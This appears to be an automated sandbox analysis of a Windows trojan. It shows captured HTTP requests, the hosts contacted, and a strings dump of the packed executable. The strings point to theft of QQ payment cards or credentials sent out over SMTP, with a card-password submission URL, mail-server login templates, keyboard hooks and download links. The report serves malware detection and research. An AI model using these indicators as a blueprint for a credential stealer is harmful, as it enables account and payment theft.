User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: dp.g.doubleclick.net
Connection: Keep-Alive
Cookie: id=c21c6444d00007f||t=1360768149|et=730|cs=002213fd480b36e81315d0d96e


HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Type: text/html
Last-Modified: Wed, 18 Sep 2013 22:34:18 GMT
Date: Sat, 13 Sep 2014 02:20:06 GMT
Expires: Sat, 13 Sep 2014 03:20:06 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 706
X-XSS-Protection: 1; mode=block
Age: 690
Cache-Control: public, max-age=3600
Alternate-Protocol: 80:quic,p=0.002
X-Google-Cookies-Blocked: id=
[gzip-compressed HTML body (706 bytes) not shown]



GET /apps/domainpark/domainpark.cgi?max_radlink_len=20&r=m&fexp=21404&client=dp-dopa15_3ph_js&channel=001623&hl=ru&adtest=off&type=0&optimize_terms=on&drid=as-drid-2246028460856896&uiopt=false&oe=UTF-8&ie=UTF-8&format=p6|r24|r12|s&ad=a6&adrep=2&num=0&output=caf&domain_name=VVV.cf089.com&v=3&allwcallad=1&adext=as1,sr1,ctc1&cd_oi=true&u_his=1&u_tz=180&dt=1410575497844&u_w=1024&u_h=768&biw=292&bih=140&psw=1020&psh=312&frm=0&uio=uv3cs1fa2sa20sl1sr1cc1-af3wi1000ff1st24sd12sv11sa12lt40ld40lv30-wi1010ff1st16sa12lt38-wi1010ff1st16sa12lt38-&rurl=http://VVV.cf089.com/³É¹¦ÐÅÏ¢.html?partner=bd3 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: hXXp://VVV.cf089.com/.........html?partner=bd3
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: dp.g.doubleclick.net
Connection: Keep-Alive
Cookie: id=c21c6444d00007f||t=1360768149|et=730|cs=002213fd480b36e81315d0d96e


HTTP/1.1 200 OK
P3P: policyref="hXXp://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Date: Sat, 13 Sep 2014 02:31:37 GMT
Server: domainserver
Cache-Control: private
Content-Length: 621
X-XSS-Protection: 1; mode=block
Alternate-Protocol: 80:quic,p=0.002
[gzip-compressed HTML body (621 bytes) not shown]


(The GET /static/caf/slave.html request above, with the identical cached response, was recorded twice more.)



GET /apps/domainpark/domainpark.cgi?max_radlink_len=20&r=m&fexp=21404&client=dp-dopa15_3ph_js&channel=001623&hl=ru&adtest=off&type=0&optimize_terms=on&drid=as-drid-2246028460856896&uiopt=false&oe=UTF-8&ie=UTF-8&format=p6|r24|r12|s&ad=a6&adrep=2&num=0&output=caf&domain_name=VVV.cf089.com&v=3&allwcallad=1&adext=as1,sr1,ctc1&cd_oi=true&u_his=0&u_tz=180&dt=1410575496813&u_w=1024&u_h=768&biw=292&bih=140&psw=1020&psh=312&frm=0&uio=uv3cs1fa2sa20sl1sr1cc1-af3wi1000ff1st24sd12sv11sa12lt40ld40lv30-wi1010ff1st16sa12lt38-wi1010ff1st16sa12lt38-&rurl=http://VVV.cf089.com/³É¹¦ÐÅÏ¢.html HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: hXXp://VVV.cf089.com/.........html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: dp.g.doubleclick.net
Connection: Keep-Alive
Cookie: id=c21c6444d00007f||t=1360768149|et=730|cs=002213fd480b36e81315d0d96e


HTTP/1.1 200 OK
P3P: policyref="hXXp://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Date: Sat, 13 Sep 2014 02:31:36 GMT
Server: domainserver
Cache-Control: private
Content-Length: 621
X-XSS-Protection: 1; mode=block
Alternate-Protocol: 80:quic,p=0.002
[gzip-compressed HTML body (621 bytes) not shown; the dump then repeats the same response headers]

<<< skipped >>>

GET /adsense/domains/caf.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.cf089.com/.........html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.google.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 13 Sep 2014 02:31:34 GMT
Expires: Sat, 13 Sep 2014 02:31:34 GMT
Cache-Control: private, max-age=3600
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="f.txt"
Content-Encoding: gzip
Server: amfe
Content-Length: 217
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Alternate-Protocol: 80:quic,p=0.002



GET /ads/search/module/ads/1.0/76529756bd9c4808112d3445d4a637b160b572c9/n/domains.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.cf089.com/.........html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.google.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 13 Sep 2014 02:31:34 GMT
Expires: Sun, 13 Sep 2015 02:31:34 GMT
Cache-Control: public, max-age=31536000
ETag: "m76529756bd9c4808112d3445d4a637b160b572c9"
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="f.txt"
Content-Encoding: gzip
Server: amfe
Content-Length: 56691
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Alternate-Protocol: 80:quic,p=0.002

<<< skipped >>>

GET /css/t_141_201401111.css HTTP/1.1
Accept: */*
Referer: hXXp://VVV.cf089.com/.........html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: a1.dnbizcdn.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine/1.4.2
Date: Sat, 13 Sep 2014 02:31:34 GMT
Content-Type: text/css
Last-Modified: Tue, 22 Apr 2014 10:30:52 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip

<<< skipped >>>

GET /js/parking_caf_141_1402251.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.cf089.com/.........html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: a1.dnbizcdn.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine/1.4.2
Date: Sat, 13 Sep 2014 02:31:34 GMT
Content-Type: application/x-javascript
Last-Modified: Tue, 09 Sep 2014 02:04:48 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip

<<< skipped >>>

GET /img/w300/search_language_1.jpg HTTP/1.1
Accept: */*
Referer: hXXp://VVV.cf089.com/.........html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: a1.dnbizcdn.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine/1.4.2
Date: Sat, 13 Sep 2014 02:31:35 GMT
Content-Type: image/jpeg
Content-Length: 2374
Last-Modified: Tue, 09 Sep 2014 03:01:53 GMT
Connection: keep-alive
Accept-Ranges: bytes
[2374-byte JPEG body omitted; its embedded Exif/XMP metadata reports Adobe XMP Core 5.3-c011, CreatorTool "Adobe Photoshop CS6 (Windows)", xmpMM:DocumentID xmp.did:A6AEF93D37CD11E4A238A243E0DA2DE9, derived from xmp.did:2ADDD9426D4511E39F35D78CF7C16A6F]

<<< skipped >>>

The Trojan connects to the servers at the following location(s) (Host headers seen in the captured requests above):

dp.g.doubleclick.net
VVV.google.com
a1.dnbizcdn.com
VVV.cf089.com (the Referer on every request above)

%original file name%.exe_664:

.text
`.rdata
@.data
.rsrc
@.vmp0
`.vmp1
.reloc
t$(SSh
~%UVW
u$SShe
wininet.dll
kernel32.dll
user32.dll
gdiplus.dll
ole32.dll
SkinH_EL.dll
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
EnumWindows
GdiplusShutdown
hXXp://ptlogin2.qq.com/getimage?aid=11000101&0.24514092205448612
hXXp://
hXXps://
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
http=
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Content-Type: application/x-www-form-urlencoded
{557CF400-1A04-11D3-9A73-0000F81EF32E}
{557CF401-1A04-11D3-9A73-0000F81EF32E}
{557CF402-1A04-11D3-9A73-0000F81EF32E}
{557CF405-1A04-11D3-9A73-0000F81EF32E}
{557CF406-1A04-11D3-9A73-0000F81EF32E}
hXXp://pay.qq.com/cgi-bin/account/account_qqcard_save_qbqd.cgi
&CardPassword=
244077923
[email protected]
smtp.qq.com
[email protected]
275535028
[email protected]
[email protected]
\jl.txt
2088258269
hXXp://url.cn/RtJuQx
fJ.WM_
CX%xm
Õ6m*
n.BjCw
%s;7*
0%x@w
%C^L:
%s T5
]E4%F(
.Funr
k%UPp
fg.VG
%C',@
>Ùd
0'.Ll
[I(3/#N0.bd
j"%u=w
q%Xn`
@|H.NI
.wdd!
S|%u4
*.Ea]S
Q.CGo
fTpe
.LLbX
-.Mdl
\-A}=3K
Y:.akpS
$.Zcqn
.WE= T!N
#?%s(C(
u.Jck~
zx/%FN[
%s=\RI
}j%c%Y)
Rx.GR
4o#.dM
IeS`%C
[n 4\.UY 
,4.qO,
gQ'.Io
%cLur?
s%DHB
]I%%X
5r.US
:mD].tB
f%fUZ
.fOuV12
*_.dC
&-N}<
({?.cQm
.Cqx~c
.`.Qw
**.dU
!n]%x
%X,Cr
&.PFy{xh
.um ZZE7L
/^p%u$
I.NoQY
zu.ew
D/.nT
b\SkinH_EL.dll
C$%cmb
.ppM|
 aZ.mO
%-^
.hk;~
KERNEL32.DLL
COMCTL32.dll
GDI32.dll
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
USER32.dll
hXXp://dl.vmall.com/c0y5dhl31e
Adobe Photoshop CS5 Windows
2013:09:07 18:22:27
*%xLq
urlTEXT
MsgeTEXT
hXXp://ns.adobe.com/xap/1.0/
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmp:CreateDate="2013-09-07T18:19:34 08:00" xmp:ModifyDate="2013-09-07T18:22:27 08:00" xmp:MetadataDate="2013-09-07T18:22:27 08:00" dc:format="image/jpeg" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:69CCED64A717E31197F9D08031ECF06A" xmpMM:DocumentID="xmp.did:68CCED64A717E31197F9D08031ECF06A" xmpMM:OriginalDocumentID="xmp.did:68CCED64A717E31197F9D08031ECF06A"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:68CCED64A717E31197F9D08031ECF06A" stEvt:when="2013-09-07T18:19:34 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:69CCED64A717E31197F9D08031ECF06A" stEvt:when="2013-09-07T18:22:27 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>
%sc;-
Ljj%FZ
2013:09:07 18:41:37
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmp:CreateDate="2013-09-07T18:19:34 08:00" xmp:ModifyDate="2013-09-07T18:41:37 08:00" xmp:MetadataDate="2013-09-07T18:41:37 08:00" dc:format="image/jpeg" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:6CCCED64A717E31197F9D08031ECF06A" xmpMM:DocumentID="xmp.did:68CCED64A717E31197F9D08031ECF06A" xmpMM:OriginalDocumentID="xmp.did:6CCCED64A717E31197F9D08031ECF06A"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:6CCCED64A717E31197F9D08031ECF06A" stEvt:when="2013-09-07T18:19:34 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>
2013:09:07 18:48:37
jkP.gN
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmp:CreateDate="2013-09-07T18:19:34 08:00" xmp:ModifyDate="2013-09-07T18:48:37 08:00" xmp:MetadataDate="2013-09-07T18:48:37 08:00" dc:format="image/jpeg" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:6ECCED64A717E31197F9D08031ECF06A" xmpMM:DocumentID="xmp.did:68CCED64A717E31197F9D08031ECF06A" xmpMM:OriginalDocumentID="xmp.did:6ECCED64A717E31197F9D08031ECF06A"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:6ECCED64A717E31197F9D08031ECF06A" stEvt:when="2013-09-07T18:19:34 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>
JQ #%X
zt.vFM72G%
}/.OP?}
2013:09:07 18:31:24
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmp:CreateDate="2013-09-07T18:19:34 08:00" xmp:ModifyDate="2013-09-07T18:31:24 08:00" xmp:MetadataDate="2013-09-07T18:31:24 08:00" dc:format="image/jpeg" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:6BCCED64A717E31197F9D08031ECF06A" xmpMM:DocumentID="xmp.did:6ACCED64A717E31197F9D08031ECF06A" xmpMM:OriginalDocumentID="xmp.did:6ACCED64A717E31197F9D08031ECF06A"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:6ACCED64A717E31197F9D08031ECF06A" stEvt:when="2013-09-07T18:19:34 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:6BCCED64A717E31197F9D08031ECF06A" stEvt:when="2013-09-07T18:31:24 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>
S%XW(=
2013:11:02 22:34:01
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmp:CreateDate="2013-11-02T22:32:16 08:00" xmp:ModifyDate="2013-11-02T22:34:01 08:00" xmp:MetadataDate="2013-11-02T22:34:01 08:00" dc:format="image/jpeg" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:2FB030D1CB43E31193368B624B8663A2" xmpMM:DocumentID="xmp.did:2FB030D1CB43E31193368B624B8663A2" xmpMM:OriginalDocumentID="xmp.did:2FB030D1CB43E31193368B624B8663A2"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:2FB030D1CB43E31193368B624B8663A2" stEvt:when="2013-11-02T22:32:16 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>
4.GRN
qW#Z%u
2014:01:08 17:17:20
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmp:CreateDate="2014-01-08T17:17:20 08:00" xmp:MetadataDate="2014-01-08T17:17:20 08:00" xmp:ModifyDate="2014-01-08T17:17:20 08:00" xmpMM:InstanceID="xmp.iid:DC6B5A084578E311939AD53276E77662" xmpMM:DocumentID="xmp.did:DB6B5A084578E311939AD53276E77662" xmpMM:OriginalDocumentID="xmp.did:DB6B5A084578E311939AD53276E77662" dc:format="image/jpeg" photoshop:ColorMode="3"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:DB6B5A084578E311939AD53276E77662" stEvt:when="2014-01-08T17:17:20 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:DC6B5A084578E311939AD53276E77662" stEvt:when="2014-01-08T17:17:20 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>
2014:01:08 17:12:43
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmp:CreateDate="2014-01-08T17:12:43 08:00" xmp:MetadataDate="2014-01-08T17:12:43 08:00" xmp:ModifyDate="2014-01-08T17:12:43 08:00" xmpMM:InstanceID="xmp.iid:DA6B5A084578E311939AD53276E77662" xmpMM:DocumentID="xmp.did:D96B5A084578E311939AD53276E77662" xmpMM:OriginalDocumentID="xmp.did:D96B5A084578E311939AD53276E77662" dc:format="image/jpeg" photoshop:ColorMode="3"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:D96B5A084578E311939AD53276E77662" stEvt:when="2014-01-08T17:12:43 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:DA6B5A084578E311939AD53276E77662" stEvt:when="2014-01-08T17:12:43 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>
%2%(,-/0/
#484.7*./.
5].fk[
}35.RBRT
8EI%D
2013:06:08 18:11:32
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmp:CreateDate="2013-06-08T18:10:22 08:00" xmp:ModifyDate="2013-06-08T18:11:32 08:00" xmp:MetadataDate="2013-06-08T18:11:32 08:00" dc:format="image/jpeg" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:308150CB23D0E211AEC8999F2ABD2F9F" xmpMM:DocumentID="xmp.did:2F8150CB23D0E211AEC8999F2ABD2F9F" xmpMM:OriginalDocumentID="xmp.did:2F8150CB23D0E211AEC8999F2ABD2F9F"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:2F8150CB23D0E211AEC8999F2ABD2F9F" stEvt:when="2013-06-08T18:10:22 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows"/> <rdf:li stEvt:action="converted" stEvt:parameters="from image/png to image/jpeg"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:308150CB23D0E211AEC8999F2ABD2F9F" stEvt:when="2013-06-08T18:11:32 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>
VVV.cf089.com/
.htmlr
1258095550
5|M%U8
VVV.vdisk.cn/wushu8
2755350288
1314520.
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
iphlpapi.dll
SHLWAPI.dll
MPR.dll
VERSION.dll
WSOCK32.dll
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
HELO %s
SMTP
AUTH LOGIN
LOGIN
AUTH=LOGIN
EHLO %s
Content-Type: application/octet-stream; name=%s
Content-Disposition: attachment; filename=%s
MAIL FROM:<%s>
RCPT TO:<%s>
VVV.dywt.com.cn
(*.htm;*.html)|*.htm;*.html
.PAVCOleException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCOleDispatchException@@
.PAVCArchiveException@@
zcÁ
c:\%original file name%.exe
hX&%suz~
WU%syz~
5551444
1111111111111141
#include "l.chs\afxres.rc" // Standard components
$;.zSx
SetViewportExtEx
WS2_32.dll
KERNEL32.dll
GetViewportOrgEx
WinExec
GetViewportExtEx
WININET.dll
GetProcessHeap
GetWindowsDirectoryA
RegCloseKey
ScaleViewportExtEx
SetWindowsHookExA
H{[.yYw
,T<*%D
'.leD]s
:e5%CG
/.Yiw
bo.jb]fU.
ADVAPI32.dll
UWINMM.dll
RegOpenKeyExA
RegCreateKeyExA
GetCPInfo
RASAPI32.dll
CreateDialogIndirectParamA
n;Kd%x
.DmK/j
x|x.xk
.Yj?G
 I.Zg
ß&wM;
EL%C(
.rGmRg
K.Nn>*&I_/E
%SlRJ
TZx.Wv
,".Wa*2E
2w.MD
2n/.QfH
KX5%x
x#.vg
3.jx(
``.jE:
.NAN)
T^L.vD8
isql
W.WV0
F,.hD
%F)ww
%u&xS
PR.Az
.gy{i
4G.vw5
.VI M
I%C- G
P.ZW4x
NSl.zs
^%CNwv|
7.kWf1
H3?%X
[ŸT
%X&J|
es.tC
-5}sB
}d.UI
~.vo\
.sswo
}.ul`
UOP%X!
#W%u$
.RcD7
$%XYy0
m-Yi} 
DS.Ei 4
gU%d'9
.eO21
_.vAw,
lt.hA
?.Amn
89>?<=234016
O%dX^
.iM4x
%XeSY
e.lD7
K].Rv
.YTM'g
G0%UG<
[.yY6
]$Gs.xS
^.XCZh
N%c;o
,.DR3
se.Jy
/; %dw
WINSPOOL.DRV
oledlg.dll
GetKeyState
SHELL32.dll
]Þ?
(='fuqg.Cg
8.BBS
n%uJoN
#.klH
%DK )
]%DIb
)u^e.JO
.Kt*?
e<=Å
5%Cw3
M%ubdt
